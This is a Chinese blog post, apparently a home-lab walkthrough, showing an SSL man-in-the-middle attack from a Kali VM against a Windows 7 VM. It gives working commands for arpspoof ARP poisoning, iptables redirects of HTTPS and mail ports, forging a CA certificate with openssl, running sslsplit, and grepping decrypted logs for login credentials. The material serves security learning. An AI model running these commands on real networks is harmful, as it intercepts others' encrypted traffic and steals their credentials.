ssl中间人攻击

最新推荐文章于 2024-09-06 09:50:39 发布
最新推荐文章于 2024-09-06 09:50:39 发布
阅读量2.6k 收藏 22
点赞数
分类专栏: ssl中间人攻击 文章标签: ssl https
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44890392/article/details/125485189
版权

一.需要的设备:

    攻击机:kali;   ip地址:192.168.0.130

    目标机:windows7虚拟机;     ip地址:192.168.0.131

    vm网关:192.168.0.2

二.思路:

    SSL为安全套阶层协议。使用加密的方式保证链接的安全性。

    ssl中间人攻击,顾名思义,就是在SSL回话中,作为客户端和服务器端中间的代理,进行数据的侦听和转发,从而实现在不被客户端发觉的情况下,获取回话内容的一种攻击方式。要实现ssl中间人攻击,需要实现两个目标:作为中间人;解密SSL数据。

    正常情况下是,客户端和服务器直接对话模式:客户端——服务器;实施ssl中间人攻击后的对话模式:客户端——中间人——服务器。

三.ssl中间人攻击实现流程: 

1.前提:网络配置正确,攻击机和目标机在同一个网段,能够ping的通。

以下所有命令均在root下进行(切换成root用户:sudo su)

2.攻击机:扮演网关

    arp欺骗,让目标机认为攻击机是网关:

       arpspoof -i eth0 -t 192.168.0.131 -r 192.168.0.2   —— -t后跟目标机,-r后跟网关

    开启后不用关闭该窗口,再新开一个窗口做接下来的事。 

    目标机:用arp -a查看目标机的网关变为攻击机的MAC地址

3.攻击机:设置转发

     由于此时攻击机扮演网关的角色,所以需要有转发功能。

3.1 开启ip转发:sysctl -w net.ipv4.ip_forward=1

3.2 清空nat表:iptables -t nat -F
3.3  端口转发规则配置,由于下边(4.4)sslsplit要统一监听一个端口(8080,自己随便设),所以此处需要将所有各种协议产生的数据包转发到8080端口

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8000        #http
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080     #https
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8080     #MSA
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8080     #SMTPS
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8080     #IMAPS
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8080     #POP3S
设置完成后可以通过iptables -t nat -L命令查看

4.攻击机:ssl解密

4.1 生成私钥:openssl genrsa -out ca.key 2048

4.2 使用私钥生成证书:openssl req -new -x509 -days 200 -key ca.key -out ca.crt    

      生成证书过程中,会让填写一些信息,自己测试阶段可以随便填。
   

4.3 创建一个目录:mkdir -p test/logdir,下边要用(4.4)

4.4 使用sslsplit实施中间人攻击

     正常写法(网上大佬的写法,我用了报错): sslsplit -D -l connect.log -j /root/test -S /root/test/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

     我修改后的写法:sslsplit -D -l connect.log -j test -S test/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8080 tcp 0.0.0.0 8000

 

    该窗口也不能关 !!

目标机测试:登录www.baidu.com会提示证书出错

    右键点击属性中的详细信息,可以查看到证书是你伪造的那个。

4.5 如果用户在目标机中进行登录百度,攻击者可以在攻击机中找到登录的账号和密码。

   目标机上产生的连接日志都会在/test/logdir目录下,进入该目录下:cd /test/logdir

   用全局搜索:grep 123456(我登陆用的账户)*,能搜索到账户密码信息,但由于像百度、淘宝这种大的机构,我们仅仅用https中间人解密并不足以看到最终的明文密码,但是https是可以解密的,用中间人攻击是成功的,这点在上边已经证实了。

结束了!

 

qq_44890392
关注
专栏目录
SSL中间人攻击(MITM)
未晚的专栏
04-16 8983
老板要求,实验几个ssl中间人攻击的工具,简单的记录下实验过程和一些简单的原理,已经使用过的几个工具的使用方法和特点,以备使用。 实验环境: 攻击机: 操作系统:kali-linux虚拟机 IP地址:192.168.138.131。 目标机: 操作系统:windows XP虚拟机 IP地址:192.168.138.128 网络: VM-NAT,网关192.168.138.2
[安卓网络安全]安卓SSL中间人攻击防范
Martin.Mu `s Special Column
11-27 1875
SSL中间人攻击安全 问题说明 漏洞影响 能实现ssl中间人攻击有三个可能性,第一个就是自定义的X509TrustManager不校验证书;或实现的自定义HostnameVerifier不校验域名接受任意域名;或使用setHostnameVerifier (ALLOW_ALL_HOSTNAME_VERIFIER)允许所有域名,这样应用容易遭受中间人攻击,存在用户敏感数据被盗取的风险。 修复建议 1...
HTTPS的加密技术——中间人攻击
闲来垂钓碧溪上的博客
05-24 2022
https是基于http的一层加密技术,有两种加密方式,针对不同的数据传输可以使用不同加密算法结合使用,最常用也最安全的是双重加密技术,不过单独使用还是会有风险,对于中间人攻击这个算法也会被偷梁换柱,于是需要引入证书对症下药,以此来保障数据的安全性和完整性。
一文带你了解中间人攻击MITM,从此不做网络的“傀儡”!零基础入门到精通,收藏这一篇就够了
最新发布
shanguicsdn111的博客
09-06 1594
中间人攻击是一种严重的网络安全威胁,但通过采取适当的预防措施和安全策略,个人和组织可以有效地保护自己免受此类攻击的影响。加强安全意识教育、使用加密通信、谨慎使用公共网络等措施可以帮助我们更好地抵御中间人攻击的威胁,确保网络通信的安全和隐私。为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
针对SSL中间人攻击
shinfocom
10-17 331
1 中间人攻击概述 中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。 随着计算机通信网技术的不断发展,MITM攻击也越来越多样化。最初,攻...
SSL中间人攻击
lionzl的专栏
07-22 1543
SSL中间人攻击http://netsecurity.51cto.com  2005-12-02 09:25    chinaitlab  我要评论(0)摘要:在本文中,我首先将对SSL做一些介绍,这是非常重要的。不过,这里我们不会介绍诸如SSL是怎样实现连接的等深层问题,如果有兴趣,可以自己参考参考资料。标签:SSL  sOracle帮您准确洞察各个物流环节简介SSLv3的当前版本是3.1版,也
SSL中间人攻击原理与防范
05-21
SSL中间人攻击原理与防范,感兴趣的自己看
基于ssl中间人攻击例子
09-23
实现一个ssl的客户端和服务端,作为中间人攻击,截取ssl通讯中的密文数据,并进行解密,使用时用把所有的报文都转向给程序所在的机器。
SSL中间人攻击的实例
03-20
SSL中间人攻击是一种网络安全攻击方式,攻击者通过篡改通信过程中的SSL证书,使得双方认为自己正在与对方直接通信,但实际上所有的通信都被攻击者窃取和篡改。这种攻击方式可以用于窃取敏感信息,如用户名、密码等。...
SSL中间人攻击(zt)
FreeXploiT
08-27 2405
简介    SSLv3的当前版本是3.1版,也被称为TLS。它提供了一种机制,在网络上进行安全的数据传输。它据说能够满足所有的安全需要,比如:你的银行帐户管理。    但是在这里我将告诉你,这实际上是不可能的。    在本文中,我首先将对SSL做一些介绍,这是非常重要的。不过,这里我们不会介绍诸如SSL是怎样实现连接的等深层问题,如果有兴趣,可以自己参考参考资料。        1.为什么使用SS
ssl攻击实例
03-21
ssl攻击实例
全球信任服务器证书,使用全球信任SSL证书,防止中间人攻击
weixin_39599705的博客
07-31 348
近期,有网友反馈Github网址疑似遭遇中间人攻击,似乎是通过骨干网络进行443端口劫持,受影响的主要是部分地区用户,并涉及中国移动、中国联通、中国电信等运营商客户,京东等网站也受到类似影响,目前受影响的网站尚未发布官方反馈。攻击者使用自签名SSL证书进行中间人劫持,攻击涉及最广的是Github.io域名,查看证书信息会发现这些网站的证书被攻击者使用自签名证书代替,自签名证书不受操作系统和浏览器系...
SSL,TLS中间人攻击
小水池
07-28 3442
概念 通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。 攻击者位于通信链路中 ARP地址欺骗 DHCP 修改网关 修改DNS 修改HOSTS ICMP协议,STP协议,OSPF路由协议 攻击前提 客户端已经信任伪造证书 攻击者控制了核发证书颁发机构 客户端程序禁止了显示证书错误警告信息 攻击者已控制客户端,强制信任伪造证书 解密中间人流量的工具...
中间人攻击SSL加密流量
Jeromeyoung
03-04 1645
中间人劫持https加密流量,对其进行解密查看明文内容。 原理:终端发送流量经过路由转发,流量被中间人劫持,直到中间人放回给服务器(中间人需具备与服务器端看起来差不多的条件) 攻击者位于客户端和服务器通信链路中进行的攻击方式: 1、ARP欺骗:(把中间人的mac地址当作网关,从而让流量流经中间人(伪造证书、解密加密信息等操作))——>欺骗终端设备,让网关误认为是中间人,从而得...
针对SSL中间人攻击演示和防范
hellotjc的专栏
01-12 1407
1 中间人攻击概述 中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。 随着计算机通信网技术的不断发展,MITM攻击也越来越多样
如何应对SSL/TLS加密中的中间人攻击(MITM)?
图幻未来的博客
02-05 823
在当今的数字世界中, SSL/TLS 加密的通信已成为保护用户隐私和数据安全的关键手段之一. 然而,随着网络攻击技术的不断发展,中间人攻击(MITM)成为了一个日益严重的安全威胁. 本文将深入探讨 MITM 攻击的原理以及应对措施以帮助企业和个人提高安全意识并减少潜在风险.* **篡改与重放: ** 对被拦截的流量进行修改或重新发送以达到窃听的目的或者是实施其他恶意行为如伪造证书等.* **拦截:** 攻击者在网络节点处截获通信双方的数据流;**1.1 原理****1.2 危害**
SSL\TLS中间人攻击
分享学习网络的点点滴滴
09-01 1235
攻击者位于客户端和服务器通信链路中ARPDHCP修改网关修改DNS修改HOSTS加密流量攻击的前提客户端已经信任伪造证书颁发机构攻击者控制了核心证书颁发机构客户端程序禁止了显示证书错误告警信息攻击者已经控制客户端,并强制其信任伪造证书。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值